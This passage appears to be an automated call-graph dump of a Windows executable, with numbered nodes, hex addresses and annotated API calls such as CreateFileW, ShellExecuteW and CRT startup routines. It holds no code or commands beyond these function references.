103446->103458 103447 fbbf73 8 API calls 103447->103458 103449 10045f3 103448->103449 103531 fd0413 29 API calls __onexit 103449->103531 103453 10045fd 103532 fd0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103453->103532 103457 fbbed9 8 API calls 103457->103458 103458->103447 103458->103457 103459 fc0340 224 API calls 103458->103459 103460 fbfae1 103458->103460 103461 fc1ca0 8 API calls 103458->103461 103463 1023fe1 81 API calls 103458->103463 103525 fbbe2d 103458->103525 103529 fcb35c 224 API calls 103458->103529 103533 fd05b2 5 API calls __Init_thread_wait 103458->103533 103534 fd0413 29 API calls __onexit 103458->103534 103535 fd0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103458->103535 103536 1035231 101 API calls 103458->103536 103537 103731e 224 API calls 103458->103537 103459->103458 103460->103419 103461->103458 103463->103458 103466 fce928 103465->103466 103468 fce959 103465->103468 103467 fce94c IsDialogMessageW 103466->103467 103466->103468 103469 100eff6 GetClassLongW 103466->103469 103467->103466 103467->103468 103468->103419 103469->103466 103469->103467 103470->103419 103471->103419 103472->103419 103473->103419 103474->103426 103475->103426 103476->103426 103478 fc0340 224 API calls 103477->103478 103498 fbe99d 103478->103498 103479 10031d3 103523 1023fe1 81 API calls __wsopen_s 103479->103523 103481 fbea0b messages 103481->103439 103482 fbeac3 103483 fbeace 103482->103483 103484 fbedd5 103482->103484 103486 fd014b 8 API calls 103483->103486 103484->103481 103492 fd017b 8 API calls 103484->103492 103485 fbecff 103487 10031c4 103485->103487 103488 fbed14 103485->103488 103495 fbead5 __fread_nolock 103486->103495 103522 1036162 8 API calls 103487->103522 103491 fd014b 8 API calls 103488->103491 103489 fbebb8 103493 fd017b 8 API calls 103489->103493 103502 fbeb6a 103491->103502 103492->103495 103500 fbeb29 __fread_nolock messages 103493->103500 103494 fd014b 8 API calls 103497 fbeaf6 103494->103497 103495->103494 103495->103497 103496 fd014b 8 API calls 103496->103498 103497->103500 103510 fbd260 103497->103510 103498->103479 103498->103481 103498->103482 103498->103484 103498->103489 103498->103496 103498->103500 103500->103485 103501 10031b3 103500->103501 103500->103502 103505 100318e 103500->103505 103507 100316c 103500->103507 103518 fb44fe 224 API calls 103500->103518 103521 1023fe1 81 API calls __wsopen_s 103501->103521 103502->103439 103520 1023fe1 81 API calls __wsopen_s 103505->103520 103519 1023fe1 81 API calls __wsopen_s 103507->103519 103509->103441 103511 fbd29a 103510->103511 103513 fbd2c6 103510->103513 103512 fbf6d0 224 API calls 103511->103512 103515 fbd2a0 103511->103515 103512->103515 103514 fc0340 224 API calls 103513->103514 103516 100184b 103514->103516 103515->103500 103516->103515 103524 1023fe1 81 API calls __wsopen_s 103516->103524 103518->103500 103519->103502 103520->103502 103521->103502 103522->103479 103523->103481 103524->103515 103526 fbbe38 103525->103526 103527 fbbe67 103526->103527 103538 fbbfa5 103526->103538 103527->103458 103529->103458 103530->103446 103531->103453 103532->103458 103533->103458 103534->103458 103535->103458 103536->103458 103537->103458 103555 fbcf80 103538->103555 103540 fbbfb5 103541 1000db6 103540->103541 103542 fbbfc3 103540->103542 103564 fbb4c8 8 API calls 103541->103564 103544 fd014b 8 API calls 103542->103544 103546 fbbfd4 103544->103546 103545 1000dc1 103547 fbbf73 8 API calls 103546->103547 103548 fbbfde 103547->103548 103549 fbbfed 103548->103549 103550 fbbed9 8 API calls 103548->103550 103551 fd014b 8 API calls 103549->103551 103550->103549 103552 fbbff7 103551->103552 103563 fbbe7b 39 API calls 103552->103563 103554 fbc01b 103554->103527 103556 fbd1c7 103555->103556 103561 fbcf93 103555->103561 103556->103540 103558 fbbf73 8 API calls 103558->103561 103559 fbd03d 103559->103540 103561->103558 103561->103559 103565 fd05b2 5 API calls __Init_thread_wait 103561->103565 103566 fd0413 29 API calls __onexit 103561->103566 103567 fd0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103561->103567 103563->103554 103564->103545 103565->103561 103566->103561 103567->103561 103568 1005650 103577 fce3d5 103568->103577 103570 1005666 103571 10056e1 103570->103571 103586 fcaa65 9 API calls 103570->103586 103575 10061d7 103571->103575 103588 1023fe1 81 API calls __wsopen_s 103571->103588 103573 10056c1 103573->103571 103587 102247e 8 API calls 103573->103587 103578 fce3f6 103577->103578 103579 fce3e3 103577->103579 103581 fce429 103578->103581 103582 fce3fb 103578->103582 103589 fbb4c8 8 API calls 103579->103589 103590 fbb4c8 8 API calls 103581->103590 103583 fd014b 8 API calls 103582->103583 103585 fce3ed 103583->103585 103585->103570 103586->103573 103587->103571 103588->103575 103589->103585 103590->103585 104765 fbda4a 104766 fbda54 104765->104766 104776 fbdbc4 104765->104776 104767 fbcf80 39 API calls 104766->104767 104766->104776 104768 fbdace 104767->104768 104769 fd014b 8 API calls 104768->104769 104770 fbdae7 104769->104770 104771 fd017b 8 API calls 104770->104771 104772 fbdb05 104771->104772 104773 fd014b 8 API calls 104772->104773 104775 fbdb16 __fread_nolock 104773->104775 104774 fd014b 8 API calls 104778 fbdb7f 104774->104778 104775->104774 104775->104776 104777 fd017b 8 API calls 104776->104777 104780 fbd5e1 104776->104780 104782 fbdc19 104776->104782 104777->104776 104778->104776 104779 fbcf80 39 API calls 104778->104779 104779->104776 104781 fd014b 8 API calls 104780->104781 104788 fbd66e messages 104781->104788 104783 fbc3ab 8 API calls 104793 fbd9ac messages 104783->104793 104784 fbbed9 8 API calls 104784->104788 104787 1001f79 104797 10156ae 8 API calls messages 104787->104797 104788->104784 104788->104787 104789 1001f94 104788->104789 104791 fbc3ab 8 API calls 104788->104791 104792 fbd911 messages 104788->104792 104796 fbb4c8 8 API calls 104788->104796 104791->104788 104792->104783 104792->104793 104794 fbd9c3 104793->104794 104795 fce30a 8 API calls messages 104793->104795 104795->104793 104796->104788 104797->104789 103591 1004452 103595 1036986 103591->103595 103593 100445d 103594 1036986 224 API calls 103593->103594 103594->103593 103596 10369ad 103595->103596 103599 10369a9 103595->103599 103597 fc0340 224 API calls 103596->103597 103598 10369ca 103597->103598 103600 10369eb 103598->103600 103602 10369fa 103598->103602 103603 10369dd 103598->103603 103599->103600 103607 1023fe1 81 API calls __wsopen_s 103599->103607 103600->103593 103605 fbc98d 39 API calls 103602->103605 103606 1023fe1 81 API calls __wsopen_s 103603->103606 103605->103599 103606->103600 103607->103600 103608 fdf06e 103609 fdf07a __FrameHandler3::FrameUnwindToState 103608->103609 103610 fdf09b 103609->103610 103611 fdf086 103609->103611 103621 fd94fd EnterCriticalSection 103610->103621 103627 fdf649 20 API calls __dosmaperr 103611->103627 103614 fdf08b 103628 fe2b5c 26 API calls ___std_exception_copy 103614->103628 103615 fdf0a7 103622 fdf0db 103615->103622 103620 fdf096 __fread_nolock 103621->103615 103630 fdf106 103622->103630 103624 fdf0b4 103629 fdf0d1 LeaveCriticalSection __fread_nolock 103624->103629 103625 fdf0e8 103625->103624 103650 fdf649 20 API calls __dosmaperr 103625->103650 103627->103614 103628->103620 103629->103620 103631 fdf12e 103630->103631 103632 fdf114 103630->103632 103634 fddcc5 __fread_nolock 26 API calls 103631->103634 103654 fdf649 20 API calls __dosmaperr 103632->103654 103635 fdf137 103634->103635 103651 fe9789 103635->103651 103636 fdf119 103655 fe2b5c 26 API calls ___std_exception_copy 103636->103655 103640 fdf23b 103641 fdf248 103640->103641 103648 fdf1ee 103640->103648 103657 fdf649 20 API calls __dosmaperr 103641->103657 103642 fdf1bf 103644 fdf1dc 103642->103644 103642->103648 103656 fdf41f 31 API calls 4 library calls 103644->103656 103646 fdf1e6 103647 fdf124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 103646->103647 103647->103625 103648->103647 103658 fdf29b 30 API calls 2 library calls 103648->103658 103650->103624 103659 fe9606 103651->103659 103653 fdf153 103653->103640 103653->103642 103653->103647 103654->103636 103655->103647 103656->103646 103657->103647 103658->103647 103660 fe9612 __FrameHandler3::FrameUnwindToState 103659->103660 103661 fe961a 103660->103661 103664 fe9632 103660->103664 103685 fdf636 20 API calls __dosmaperr 103661->103685 103662 fe96e6 103690 fdf636 20 API calls __dosmaperr 103662->103690 103664->103662 103667 fe966a 103664->103667 103666 fe961f 103686 fdf649 20 API calls __dosmaperr 103666->103686 103684 fe54ba EnterCriticalSection 103667->103684 103668 fe96eb 103691 fdf649 20 API calls __dosmaperr 103668->103691 103672 fe9670 103674 fe96a9 103672->103674 103675 fe9694 103672->103675 103673 fe96f3 103692 fe2b5c 26 API calls ___std_exception_copy 103673->103692 103678 fe970b __wsopen_s 28 API calls 103674->103678 103687 fdf649 20 API calls __dosmaperr 103675->103687 103681 fe96a4 103678->103681 103679 fe9699 103688 fdf636 20 API calls __dosmaperr 103679->103688 103680 fe9627 __fread_nolock 103680->103653 103689 fe96de LeaveCriticalSection __wsopen_s 103681->103689 103684->103672 103685->103666 103686->103680 103687->103679 103688->103681 103689->103680 103690->103668 103691->103673 103692->103680 103693 1006555 103694 fd014b 8 API calls 103693->103694 103695 100655c 103694->103695 103696 fd017b 8 API calls 103695->103696 103699 1006575 __fread_nolock 103695->103699 103696->103699 103697 fd017b 8 API calls 103698 100659a 103697->103698 103699->103697 103700 fd076b 103701 fd0777 __FrameHandler3::FrameUnwindToState 103700->103701 103730 fd0221 103701->103730 103703 fd077e 103704 fd08d1 103703->103704 103707 fd07a8 103703->103707 103768 fd0baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 103704->103768 103706 fd08d8 103769 fd51c2 28 API calls _abort 103706->103769 103719 fd07e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 103707->103719 103741 fe27ed 103707->103741 103709 fd08de 103770 fd5174 28 API calls _abort 103709->103770 103713 fd08e6 103714 fd07c7 103716 fd0848 103749 fd0cc9 103716->103749 103718 fd084e 103753 fb331b 103718->103753 103719->103716 103764 fd518a 38 API calls 3 library calls 103719->103764 103724 fd086a 103724->103706 103725 fd086e 103724->103725 103726 fd0877 103725->103726 103766 fd5165 28 API calls _abort 103725->103766 103767 fd03b0 13 API calls 2 library calls 103726->103767 103729 fd087f 103729->103714 103731 fd022a 103730->103731 103771 fd0a08 IsProcessorFeaturePresent 103731->103771 103733 fd0236 103772 fd3004 10 API calls 3 library calls 103733->103772 103735 fd023b 103736 fd023f 103735->103736 103773 fe2687 103735->103773 103736->103703 103739 fd0256 103739->103703 103743 fe2804 103741->103743 103742 fd0dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 103744 fd07c1 103742->103744 103743->103742 103744->103714 103745 fe2791 103744->103745 103748 fe27c0 103745->103748 103746 fd0dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 103747 fe27e9 103746->103747 103747->103719 103748->103746 103841 fd26b0 103749->103841 103752 fd0cef 103752->103718 103754 fb3327 IsThemeActive 103753->103754 103755 fb3382 103753->103755 103843 fd52b3 103754->103843 103765 fd0d02 GetModuleHandleW 103755->103765 103757 fb3352 103849 fd5319 103757->103849 103759 fb3359 103856 fb32e6 SystemParametersInfoW SystemParametersInfoW 103759->103856 103761 fb3360 103857 fb338b 103761->103857 103763 fb3368 SystemParametersInfoW 103763->103755 103764->103716 103765->103724 103766->103726 103767->103729 103768->103706 103769->103709 103770->103713 103771->103733 103772->103735 103777 fed576 103773->103777 103776 fd302d 8 API calls 3 library calls 103776->103736 103779 fed58f 103777->103779 103781 fed593 103777->103781 103795 fd0dfc 103779->103795 103780 fd0248 103780->103739 103780->103776 103781->103779 103783 fe4f6e 103781->103783 103784 fe4f7a __FrameHandler3::FrameUnwindToState 103783->103784 103802 fe32d1 EnterCriticalSection 103784->103802 103786 fe4f81 103803 fe5422 103786->103803 103788 fe4f90 103794 fe4f9f 103788->103794 103816 fe4e02 29 API calls 103788->103816 103791 fe4f9a 103817 fe4eb8 GetStdHandle GetFileType 103791->103817 103793 fe4fb0 __fread_nolock 103793->103781 103818 fe4fbb LeaveCriticalSection _abort 103794->103818 103796 fd0e05 103795->103796 103797 fd0e07 IsProcessorFeaturePresent 103795->103797 103796->103780 103799 fd0fce 103797->103799 103840 fd0f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 103799->103840 103801 fd10b1 103801->103780 103802->103786 103804 fe542e __FrameHandler3::FrameUnwindToState 103803->103804 103805 fe543b 103804->103805 103806 fe5452 103804->103806 103827 fdf649 20 API calls __dosmaperr 103805->103827 103819 fe32d1 EnterCriticalSection 103806->103819 103809 fe5440 103828 fe2b5c 26 API calls ___std_exception_copy 103809->103828 103811 fe544a __fread_nolock 103811->103788 103812 fe548a 103829 fe54b1 LeaveCriticalSection _abort 103812->103829 103815 fe545e 103815->103812 103820 fe5373 103815->103820 103816->103791 103817->103794 103818->103793 103819->103815 103830 fe4ff0 103820->103830 103822 fe5392 103823 fe2d38 _free 20 API calls 103822->103823 103825 fe53e4 103823->103825 103825->103815 103826 fe5385 103826->103822 103837 fe3778 11 API calls 2 library calls 103826->103837 103827->103809 103828->103811 103829->103811 103836 fe4ffd pre_c_initialization 103830->103836 103831 fe503d 103839 fdf649 20 API calls __dosmaperr 103831->103839 103832 fe5028 RtlAllocateHeap 103834 fe503b 103832->103834 103832->103836 103834->103826 103836->103831 103836->103832 103838 fd521d 7 API calls 2 library calls 103836->103838 103837->103826 103838->103836 103839->103834 103840->103801 103842 fd0cdc GetStartupInfoW 103841->103842 103842->103752 103844 fd52bf __FrameHandler3::FrameUnwindToState 103843->103844 103906 fe32d1 EnterCriticalSection 103844->103906 103846 fd52ca pre_c_initialization 103907 fd530a 103846->103907 103848 fd52ff __fread_nolock 103848->103757 103850 fd533f 103849->103850 103851 fd5325 103849->103851 103850->103759 103851->103850 103911 fdf649 20 API calls __dosmaperr 103851->103911 103853 fd532f 103912 fe2b5c 26 API calls ___std_exception_copy 103853->103912 103855 fd533a 103855->103759 103856->103761 103858 fb339b __wsopen_s 103857->103858 103859 fbbf73 8 API calls 103858->103859 103860 fb33a7 GetCurrentDirectoryW 103859->103860 103913 fb4fd9 103860->103913 103862 fb33ce IsDebuggerPresent 103863 fb33dc 103862->103863 103864 ff3ca3 MessageBoxA 103862->103864 103865 ff3cbb 103863->103865 103866 fb33f0 103863->103866 103864->103865 104017 fb4176 8 API calls 103865->104017 103981 fb3a95 103866->103981 103873 fb3462 103875 ff3cec SetCurrentDirectoryW 103873->103875 103876 fb346a 103873->103876 103875->103876 103877 fb3475 103876->103877 104018 1011fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 103876->104018 104013 fb34d3 7 API calls 103877->104013 103881 ff3d07 103881->103877 103883 ff3d19 103881->103883 104019 fb5594 103883->104019 103884 fb347f 103887 fb396b 60 API calls 103884->103887 103890 fb3494 103884->103890 103886 ff3d22 103888 fbb329 8 API calls 103886->103888 103887->103890 103889 ff3d30 103888->103889 103892 ff3d5f 103889->103892 103893 ff3d38 103889->103893 103891 fb34af 103890->103891 103894 fb3907 Shell_NotifyIconW 103890->103894 103897 fb34b6 SetCurrentDirectoryW 103891->103897 103896 fb6b7c 8 API calls 103892->103896 103895 fb6b7c 8 API calls 103893->103895 103894->103891 103898 ff3d43 103895->103898 103899 ff3d5b GetForegroundWindow ShellExecuteW 103896->103899 103900 fb34ca 103897->103900 103901 fb7bb5 8 API calls 103898->103901 103903 ff3d90 103899->103903 103900->103763 103904 ff3d51 103901->103904 103903->103891 103905 fb6b7c 8 API calls 103904->103905 103905->103899 103906->103846 103910 fe3319 LeaveCriticalSection 103907->103910 103909 fd5311 103909->103848 103910->103909 103911->103853 103912->103855 103914 fbbf73 8 API calls 103913->103914 103915 fb4fef 103914->103915 104026 fb63d7 103915->104026 103917 fb500d 103918 fbbd57 8 API calls 103917->103918 103919 fb5021 103918->103919 103920 fbbed9 8 API calls 103919->103920 103921 fb502c 103920->103921 104040 fb893c 103921->104040 103924 fbb329 8 API calls 103925 fb5045 103924->103925 103926 fbbe2d 39 API calls 103925->103926 103927 fb5055 103926->103927 103928 fbb329 8 API calls 103927->103928 103929 fb507b 103928->103929 103930 fbbe2d 39 API calls 103929->103930 103931 fb508a 103930->103931 103932 fbbf73 8 API calls 103931->103932 103933 fb50a8 103932->103933 104043 fb51ca 103933->104043 103936 fd4d98 _strftime 40 API calls 103937 fb50c2 103936->103937 103938 fb50cc 103937->103938 103939 ff4b23 103937->103939 103940 fd4d98 _strftime 40 API calls 103938->103940 103941 fb51ca 8 API calls 103939->103941 103942 fb50d7 103940->103942 103943 ff4b37 103941->103943 103942->103943 103944 fb50e1 103942->103944 103946 fb51ca 8 API calls 103943->103946 103945 fd4d98 _strftime 40 API calls 103944->103945 103947 fb50ec 103945->103947 103948 ff4b53 103946->103948 103947->103948 103949 fb50f6 103947->103949 103950 fb5594 10 API calls 103948->103950 103951 fd4d98 _strftime 40 API calls 103949->103951 103952 ff4b76 103950->103952 103953 fb5101 103951->103953 103954 fb51ca 8 API calls 103952->103954 103955 fb510b 103953->103955 103956 ff4b9f 103953->103956 103957 ff4b82 103954->103957 103958 fb512e 103955->103958 103962 fbbed9 8 API calls 103955->103962 103959 fb51ca 8 API calls 103956->103959 103961 fbbed9 8 API calls 103957->103961 103960 ff4bda 103958->103960 103964 fb7e12 8 API calls 103958->103964 103963 ff4bbd 103959->103963 103965 ff4b90 103961->103965 103966 fb5121 103962->103966 103967 fbbed9 8 API calls 103963->103967 103968 fb513e 103964->103968 103969 fb51ca 8 API calls 103965->103969 103970 fb51ca 8 API calls 103966->103970 103971 ff4bcb 103967->103971 103973 fb8470 8 API calls 103968->103973 103969->103956 103970->103958 103972 fb51ca 8 API calls 103971->103972 103972->103960 103974 fb514c 103973->103974 104049 fb8a60 103974->104049 103976 fb893c 8 API calls 103978 fb5167 103976->103978 103977 fb8a60 8 API calls 103977->103978 103978->103976 103978->103977 103979 fb51ab 103978->103979 103980 fb51ca 8 API calls 103978->103980 103979->103862 103980->103978 103982 fb3aa2 __wsopen_s 103981->103982 103983 fb3abb 103982->103983 103984 ff40da ___scrt_fastfail 103982->103984 103985 fb5851 9 API calls 103983->103985 103987 ff40f6 GetOpenFileNameW 103984->103987 103986 fb3ac4 103985->103986 104068 fb3a57 103986->104068 103989 ff4145 103987->103989 103990 fb8577 8 API calls 103989->103990 103992 ff415a 103990->103992 103992->103992 103994 fb3ad9 104086 fb62d5 103994->104086 104631 fb3624 7 API calls 104013->104631 104015 fb347a 104016 fb35b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104015->104016 104016->103884 104017->103873 104018->103881 104020 ff22d0 __wsopen_s 104019->104020 104021 fb55a1 GetModuleFileNameW 104020->104021 104022 fbb329 8 API calls 104021->104022 104023 fb55c7 104022->104023 104024 fb5851 9 API calls 104023->104024 104025 fb55d1 104024->104025 104025->103886 104027 fb63e4 __wsopen_s 104026->104027 104028 fb8577 8 API calls 104027->104028 104029 fb6416 104027->104029 104028->104029 104030 fb655e 8 API calls 104029->104030 104039 fb644c 104029->104039 104030->104029 104031 fb654f 104031->103917 104032 fbb329 8 API calls 104033 fb6543 104032->104033 104035 fb6a7c 8 API calls 104033->104035 104034 fbb329 8 API calls 104034->104039 104035->104031 104037 fb651a 104037->104031 104037->104032 104038 fb655e 8 API calls 104038->104039 104039->104034 104039->104037 104039->104038 104060 fb6a7c 104039->104060 104041 fd014b 8 API calls 104040->104041 104042 fb5038 104041->104042 104042->103924 104044 fb51f2 104043->104044 104047 fb51d4 104043->104047 104045 fb8577 8 API calls 104044->104045 104046 fb50b4 104045->104046 104046->103936 104047->104046 104048 fbbed9 8 API calls 104047->104048 104048->104046 104050 fb8a76 104049->104050 104051 ff6737 104050->104051 104056 fb8a80 104050->104056 104066 fcb7a2 8 API calls 104051->104066 104052 ff6744 104067 fbb4c8 8 API calls 104052->104067 104055 ff6762 104055->104055 104056->104052 104057 fb8b94 104056->104057 104059 fb8b9b 104056->104059 104058 fd014b 8 API calls 104057->104058 104058->104059 104059->103978 104062 fb6a8b 104060->104062 104065 fb6aac __fread_nolock 104060->104065 104061 fd014b 8 API calls 104064 fb6abf 104061->104064 104063 fd017b 8 API calls 104062->104063 104063->104065 104064->104039 104065->104061 104066->104052 104067->104055 104069 ff22d0 __wsopen_s 104068->104069 104070 fb3a64 GetLongPathNameW 104069->104070 104071 fb8577 8 API calls 104070->104071 104072 fb3a8c 104071->104072 104073 fb53f2 104072->104073 104074 fbbf73 8 API calls 104073->104074 104075 fb5404 104074->104075 104076 fb5851 9 API calls 104075->104076 104077 fb540f 104076->104077 104078 fb541a 104077->104078 104079 ff4d5b 104077->104079 104081 fb6a7c 8 API calls 104078->104081 104083 ff4d7d 104079->104083 104122 fce36b 41 API calls 104079->104122 104082 fb5426 104081->104082 104116 fb1340 104082->104116 104085 fb5439 104085->103994 104123 fb6679 104086->104123 104117 fb1352 104116->104117 104121 fb1371 __fread_nolock 104116->104121 104119 fd017b 8 API calls 104117->104119 104118 fd014b 8 API calls 104120 fb1388 104118->104120 104119->104121 104120->104085 104121->104118 104122->104079 104302 fb663e LoadLibraryA 104123->104302 104303 fb6656 GetProcAddress 104302->104303 104304 fb6674 104302->104304 104305 fb6666 104303->104305 104307 fde95b 104304->104307 104305->104304 104306 fb666d FreeLibrary 104305->104306 104306->104304 104339 fde89a 104307->104339 104341 fde8a6 __FrameHandler3::FrameUnwindToState 104339->104341 104340 fde8b4 104341->104340 104344 fde8e4 104341->104344 104631->104015 104798 fbf4c0 104801 fca025 104798->104801 104800 fbf4cc 104802 fca046 104801->104802 104803 fca0a3 104801->104803 104802->104803 104804 fc0340 224 API calls 104802->104804 104807 fca0e7 104803->104807 104810 1023fe1 81 API calls __wsopen_s 104803->104810 104808 fca077 104804->104808 104806 100806b 104806->104806 104807->104800 104808->104803 104808->104807 104809 fbbed9 8 API calls 104808->104809 104809->104803 104810->104806 104811 fe8782 104816 fe853e 104811->104816 104814 fe87aa 104821 fe856f try_get_first_available_module 104816->104821 104818 fe876e 104835 fe2b5c 26 API calls ___std_exception_copy 104818->104835 104820 fe86c3 104820->104814 104828 ff0d04 104820->104828 104824 fe86b8 104821->104824 104831 fd917b 40 API calls 2 library calls 104821->104831 104823 fe870c 104823->104824 104832 fd917b 40 API calls 2 library calls 104823->104832 104824->104820 104834 fdf649 20 API calls __dosmaperr 104824->104834 104826 fe872b 104826->104824 104833 fd917b 40 API calls 2 library calls 104826->104833 104836 ff0401 104828->104836 104830 ff0d1f 104830->104814 104831->104823 104832->104826 104833->104824 104834->104818 104835->104820 104838 ff040d __FrameHandler3::FrameUnwindToState 104836->104838 104837 ff041b 104894 fdf649 20 API calls __dosmaperr 104837->104894 104838->104837 104840 ff0454 104838->104840 104847 ff09db 104840->104847 104841 ff0420 104895 fe2b5c 26 API calls ___std_exception_copy 104841->104895 104846 ff042a __fread_nolock 104846->104830 104897 ff07af 104847->104897 104850 ff0a0d 104929 fdf636 20 API calls __dosmaperr 104850->104929 104851 ff0a26 104915 fe5594 104851->104915 104854 ff0a2b 104856 ff0a4b 104854->104856 104857 ff0a34 104854->104857 104855 ff0a12 104930 fdf649 20 API calls __dosmaperr 104855->104930 104928 ff071a CreateFileW 104856->104928 104931 fdf636 20 API calls __dosmaperr 104857->104931 104861 ff0a39 104932 fdf649 20 API calls __dosmaperr 104861->104932 104863 ff0b01 GetFileType 104864 ff0b0c GetLastError 104863->104864 104865 ff0b53 104863->104865 104935 fdf613 20 API calls 2 library calls 104864->104935 104937 fe54dd 21 API calls 3 library calls 104865->104937 104866 ff0ad6 GetLastError 104934 fdf613 20 API calls 2 library calls 104866->104934 104869 ff0a84 104869->104863 104869->104866 104933 ff071a CreateFileW 104869->104933 104870 ff0b1a CloseHandle 104870->104855 104872 ff0b43 104870->104872 104936 fdf649 20 API calls __dosmaperr 104872->104936 104874 ff0ac9 104874->104863 104874->104866 104876 ff0b74 104877 ff0bc0 104876->104877 104938 ff092b 72 API calls 4 library calls 104876->104938 104882 ff0bed 104877->104882 104939 ff04cd 72 API calls 4 library calls 104877->104939 104878 ff0b48 104878->104855 104881 ff0be6 104881->104882 104883 ff0bfe 104881->104883 104940 fe8a2e 104882->104940 104885 ff0478 104883->104885 104886 ff0c7c CloseHandle 104883->104886 104896 ff04a1 LeaveCriticalSection __wsopen_s 104885->104896 104955 ff071a CreateFileW 104886->104955 104888 ff0ca7 104889 ff0cdd 104888->104889 104890 ff0cb1 GetLastError 104888->104890 104889->104885 104956 fdf613 20 API calls 2 library calls 104890->104956 104892 ff0cbd 104957 fe56a6 21 API calls 3 library calls 104892->104957 104894->104841 104895->104846 104896->104846 104898 ff07ea 104897->104898 104899 ff07d0 104897->104899 104958 ff073f 104898->104958 104899->104898 104965 fdf649 20 API calls __dosmaperr 104899->104965 104902 ff07df 104966 fe2b5c 26 API calls ___std_exception_copy 104902->104966 104904 ff0822 104905 ff0851 104904->104905 104967 fdf649 20 API calls __dosmaperr 104904->104967 104913 ff08a4 104905->104913 104969 fdda7d 26 API calls 2 library calls 104905->104969 104908 ff089f 104910 ff091e 104908->104910 104908->104913 104909 ff0846 104968 fe2b5c 26 API calls ___std_exception_copy 104909->104968 104970 fe2b6c 11 API calls _abort 104910->104970 104913->104850 104913->104851 104914 ff092a 104916 fe55a0 __FrameHandler3::FrameUnwindToState 104915->104916 104973 fe32d1 EnterCriticalSection 104916->104973 104918 fe55ee 104974 fe569d 104918->104974 104920 fe55a7 104920->104918 104921 fe55cc 104920->104921 104925 fe563a EnterCriticalSection 104920->104925 104923 fe5373 __wsopen_s 21 API calls 104921->104923 104922 fe5617 __fread_nolock 104922->104854 104924 fe55d1 104923->104924 104924->104918 104977 fe54ba EnterCriticalSection 104924->104977 104925->104918 104926 fe5647 LeaveCriticalSection 104925->104926 104926->104920 104928->104869 104929->104855 104930->104885 104931->104861 104932->104855 104933->104874 104934->104855 104935->104870 104936->104878 104937->104876 104938->104877 104939->104881 104941 fe5737 __wsopen_s 26 API calls 104940->104941 104943 fe8a3e 104941->104943 104942 fe8a44 104979 fe56a6 21 API calls 3 library calls 104942->104979 104943->104942 104945 fe5737 __wsopen_s 26 API calls 104943->104945 104954 fe8a76 104943->104954 104948 fe8a6d 104945->104948 104946 fe5737 __wsopen_s 26 API calls 104949 fe8a82 CloseHandle 104946->104949 104947 fe8a9c 104951 fe8abe 104947->104951 104980 fdf613 20 API calls 2 library calls 104947->104980 104952 fe5737 __wsopen_s 26 API calls 104948->104952 104949->104942 104953 fe8a8e GetLastError 104949->104953 104951->104885 104952->104954 104953->104942 104954->104942 104954->104946 104955->104888 104956->104892 104957->104889 104960 ff0757 104958->104960 104959 ff0772 104959->104904 104960->104959 104971 fdf649 20 API calls __dosmaperr 104960->104971 104962 ff0796 104972 fe2b5c 26 API calls ___std_exception_copy 104962->104972 104964 ff07a1 104964->104904 104965->104902 104966->104898 104967->104909 104968->104905 104969->104908 104970->104914 104971->104962 104972->104964 104973->104920 104978 fe3319 LeaveCriticalSection 104974->104978 104976 fe56a4 104976->104922 104977->104918 104978->104976 104979->104947 104980->104951 104632 fbf5e5 104635 fbcab0 104632->104635 104636 fbcacb 104635->104636 104637 100150c 104636->104637 104638 10014be 104636->104638 104664 fbcaf0 104636->104664 104675 10362ff 224 API calls 2 library calls 104637->104675 104641 10014c8 104638->104641 104644 10014d5 104638->104644 104638->104664 104673 1036790 224 API calls 104641->104673 104643 fcbc58 8 API calls 104643->104664 104657 fbcdc0 104644->104657 104674 1036c2d 224 API calls 2 library calls 104644->104674 104647 100179f 104647->104647 104649 fbcf80 39 API calls 104649->104664 104652 fbcdee 104653 10016e8 104678 1036669 81 API calls 104653->104678 104656 fbbe2d 39 API calls 104656->104664 104657->104652 104679 1023fe1 81 API calls __wsopen_s 104657->104679 104661 fce807 39 API calls 104661->104664 104662 fc0340 224 API calls 104662->104664 104663 fbbed9 8 API calls 104663->104664 104664->104643 104664->104649 104664->104652 104664->104653 104664->104656 104664->104657 104664->104661 104664->104662 104664->104663 104666 fce7c1 39 API calls 104664->104666 104667 fcaa99 224 API calls 104664->104667 104668 fd05b2 5 API calls __Init_thread_wait 104664->104668 104669 fd0413 29 API calls __onexit 104664->104669 104670 fd0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104664->104670 104671 fcf4df 81 API calls 104664->104671 104672 fcf346 224 API calls 104664->104672 104676 fbb4c8 8 API calls 104664->104676 104677 100ffaf 8 API calls 104664->104677 104666->104664 104667->104664 104668->104664 104669->104664 104670->104664 104671->104664 104672->104664 104673->104644 104674->104657 104675->104664 104676->104664 104677->104664 104678->104657 104679->104647 104981 fb1044 104986 fb2793 104981->104986 104983 fb104a 105022 fd0413 29 API calls __onexit 104983->105022 104985 fb1054 105023 fb2a38 104986->105023 104990 fb280a 104991 fbbf73 8 API calls 104990->104991 104992 fb2814 104991->104992 104993 fbbf73 8 API calls 104992->104993 104994 fb281e 104993->104994 104995 fbbf73 8 API calls 104994->104995 104996 fb2828 104995->104996 104997 fbbf73 8 API calls 104996->104997 104998 fb2866 104997->104998 104999 fbbf73 8 API calls 104998->104999 105000 fb2932 104999->105000 105033 fb2dbc 105000->105033 105004 fb2964 105005 fbbf73 8 API calls 105004->105005 105006 fb296e 105005->105006 105007 fc3160 9 API calls 105006->105007 105008 fb2999 105007->105008 105060 fb3166 105008->105060 105010 fb29b5 105011 fb29c5 GetStdHandle 105010->105011 105012 ff39e7 105011->105012 105015 fb2a1a 105011->105015 105013 ff39f0 105012->105013 105012->105015 105014 fd014b 8 API calls 105013->105014 105016 ff39f7 105014->105016 105017 fb2a27 OleInitialize 105015->105017 105067 1020ac4 